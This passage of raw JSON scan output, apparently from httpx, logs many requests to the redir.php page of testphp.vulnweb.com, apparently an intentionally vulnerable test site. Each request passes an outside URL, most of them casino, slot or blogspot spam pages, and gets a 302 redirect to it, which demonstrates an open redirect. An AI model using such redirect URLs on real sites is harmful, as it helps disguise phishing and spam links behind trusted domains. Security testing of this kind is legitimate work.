\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:10.644475407Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://donenewsguest.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://donenewsguest.blogspot.com/\",\"location\":\"http://donenewsguest.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://donenewsguest.blogspot.com/\",\"time\":\"345.057133ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:10.684002174Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://dramatokomedie.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://dramatokomedie.blogspot.com\",\"location\":\"http://dramatokomedie.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://dramatokomedie.blogspot.com\",\"time\":\"338.820968ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:10.793459395Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://dramatokomedie.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://dramatokomedie.blogspot.com/\",\"location\":\"http://dramatokomedie.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://dramatokomedie.blogspot.com/\",\"time\":\"351.813969ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:10.861200918Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://drkubasik.pl/tag/foBR4QIaok\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://drkubasik.pl/tag/foBR4QIaok\",\"location\":\"http://drkubasik.pl/tag/foBR4QIaok\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://drkubasik.pl/tag/foBR4QIaok\",\"time\":\"355.066503ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:10.894251259Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://drymixproducts1.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://drymixproducts1.blogspot.com/\",\"location\":\"http://drymixproducts1.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://drymixproducts1.blogspot.com/\",\"time\":\"357.397285ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:10.943966756Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://drymixproducts1.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://drymixproducts1.blogspot.com/management.html\",\"location\":\"http://drymixproducts1.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://drymixproducts1.blogspot.com/management.html\",\"time\":\"348.872325ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:11.026779201Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://dsafwas.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://dsafwas.blogspot.com/\",\"location\":\"http://dsafwas.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://dsafwas.blogspot.com/\",\"time\":\"351.528674ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:11.099198744Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://duniaceme.pro\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://duniaceme.pro\",\"location\":\"http://duniaceme.pro\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://duniaceme.pro\",\"time\":\"352.769032ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:11.201751589Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://duniaceme.pro/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://duniaceme.pro/\",\"location\":\"http://duniaceme.pro/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://duniaceme.pro/\",\"time\":\"354.951214ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:14.402802499Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://dziendobryfilm.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://dziendobryfilm.blogspot.com\",\"location\":\"http://dziendobryfilm.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://dziendobryfilm.blogspot.com\",\"time\":\"342.939601ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:14.565263685Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://e-lena-hatzel-malerei.de/wordpress/?attachment_id=1337/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://e-lena-hatzel-malerei.de/wordpress/?attachment_id=1337/\",\"location\":\"http://e-lena-hatzel-malerei.de/wordpress/?attachment_id=1337/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://e-lena-hatzel-malerei.de/wordpress/?attachment_id=1337/\",\"time\":\"351.377555ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:14.636394457Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://eduardoamgw386.yousher.com/on-the-web-casino-bonuses-promotions-2022\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://eduardoamgw386.yousher.com/on-the-web-casino-bonuses-promotions-2022\",\"location\":\"http://eduardoamgw386.yousher.com/on-the-web-casino-bonuses-promotions-2022\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://eduardoamgw386.yousher.com/on-the-web-casino-bonuses-promotions-2022\",\"time\":\"340.49437ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:14.681590957Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://fafaslot-33.weebly.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://fafaslot-33.weebly.com/\",\"location\":\"http://fafaslot-33.weebly.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://fafaslot-33.weebly.com/\",\"time\":\"343.030632ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:15.059426128Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://fcvirtual.uni.edu.pe/courses/889IDN/document/megabet303.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://fcvirtual.uni.edu.pe/courses/889IDN/document/megabet303.html\",\"location\":\"http://fcvirtual.uni.edu.pe/courses/889IDN/document/megabet303.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://fcvirtual.uni.edu.pe/courses/889IDN/document/megabet303.html\",\"time\":\"356.021414ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:15.454357216Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://fenta.eklablog.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://fenta.eklablog.com\",\"location\":\"http://fenta.eklablog.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://fenta.eklablog.com\",\"time\":\"348.378458ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:15.489618459Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://fenta.eklablog.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://fenta.eklablog.com/\",\"location\":\"http://fenta.eklablog.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://fenta.eklablog.com/\",\"time\":\"351.175428ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:15.68827139Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://fenta.eklablog.com/%20%20%20%20/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://fenta.eklablog.com/%20%20%20%20/\",\"location\":\"http://fenta.eklablog.com/ /\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://fenta.eklablog.com/%20%20%20%20/\",\"time\":\"344.673151ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:16.21975523Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://fenta.eklablog.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://fenta.eklablog.com/management.html\",\"location\":\"http://fenta.eklablog.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://fenta.eklablog.com/management.html\",\"time\":\"343.613095ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:16.270561386Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://filmavnia.wordpress.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://filmavnia.wordpress.com/\",\"location\":\"http://filmavnia.wordpress.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://filmavnia.wordpress.com/\",\"time\":\"342.654816ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:17.944311107Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://filmovik.wordpress.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://filmovik.wordpress.com\",\"location\":\"http://filmovik.wordpress.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://filmovik.wordpress.com\",\"time\":\"338.602425ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:19.247830009Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://filmowenowoscicda.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://filmowenowoscicda.blogspot.com\",\"location\":\"http://filmowenowoscicda.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://filmowenowoscicda.blogspot.com\",\"time\":\"346.879849ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:19.295925746Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://filmowenowoscicda.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://filmowenowoscicda.blogspot.com/\",\"location\":\"http://filmowenowoscicda.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://filmowenowoscicda.blogspot.com/\",\"time\":\"347.758205ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:19.615240555Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://filmownia1.wordpress.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://filmownia1.wordpress.com/\",\"location\":\"http://filmownia1.wordpress.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://filmownia1.wordpress.com/\",\"time\":\"353.013522ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:20.483927971Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://filmowymaniaks.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://filmowymaniaks.blogspot.com/\",\"location\":\"http://filmowymaniaks.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://filmowymaniaks.blogspot.com/\",\"time\":\"348.504169ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:20.510230162Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://filmycda.online/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://filmycda.online/\",\"location\":\"http://filmycda.online/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://filmycda.online/\",\"time\":\"355.959192ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:20.554587042Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://financieel.blog//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://financieel.blog//\",\"location\":\"http://financieel.blog//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://financieel.blog//\",\"time\":\"352.146169ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:20.564660693Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://findattorneyorlawyer.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://findattorneyorlawyer.com\",\"location\":\"http://findattorneyorlawyer.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://findattorneyorlawyer.com\",\"time\":\"343.185387ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:20.849250925Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://fitnessalonghealth.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://fitnessalonghealth.com/\",\"location\":\"http://fitnessalonghealth.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://fitnessalonghealth.com/\",\"time\":\"339.98647ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:20.916220708Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://fnewsani.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://fnewsani.blogspot.com/\",\"location\":\"http://fnewsani.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://fnewsani.blogspot.com/\",\"time\":\"348.211538ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:20.93396225Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://fnewshub.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://fnewshub.com/\",\"location\":\"http://fnewshub.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://fnewshub.com/\",\"time\":\"358.128111ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:21.002733379Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://forkliftswildwestlifttrucks.com/buffalo-forklift-repair-orange-county-california\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://forkliftswildwestlifttrucks.com/buffalo-forklift-repair-orange-county-california\",\"location\":\"http://forkliftswildwestlifttrucks.com/buffalo-forklift-repair-orange-county-california\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://forkliftswildwestlifttrucks.com/buffalo-forklift-repair-orange-county-california\",\"time\":\"354.807359ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:21.044070762Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://forumtrabzon.net/members/26944.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://forumtrabzon.net/members/26944.html\",\"location\":\"http://forumtrabzon.net/members/26944.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://forumtrabzon.net/members/26944.html\",\"time\":\"356.733999ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:21.139213782Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://fotoaz.com.ua/forum/viewtopic.php?t=30563\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://fotoaz.com.ua/forum/viewtopic.php?t=30563\",\"location\":\"http://fotoaz.com.ua/forum/viewtopic.php?t=30563\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://fotoaz.com.ua/forum/viewtopic.php?t=30563\",\"time\":\"343.499798ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:21.202184126Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://furnitureorg.tk\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://furnitureorg.tk\",\"location\":\"http://furnitureorg.tk\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://furnitureorg.tk\",\"time\":\"338.741442ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:21.248479354Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://gamehgfobek.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://gamehgfobek.blogspot.com/\",\"location\":\"http://gamehgfobek.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://gamehgfobek.blogspot.com/\",\"time\":\"351.969212ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:21.288596203Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://gamehgfobek.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://gamehgfobek.blogspot.com/management.html\",\"location\":\"http://gamehgfobek.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://gamehgfobek.blogspot.com/management.html\",\"time\":\"342.127399ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"ot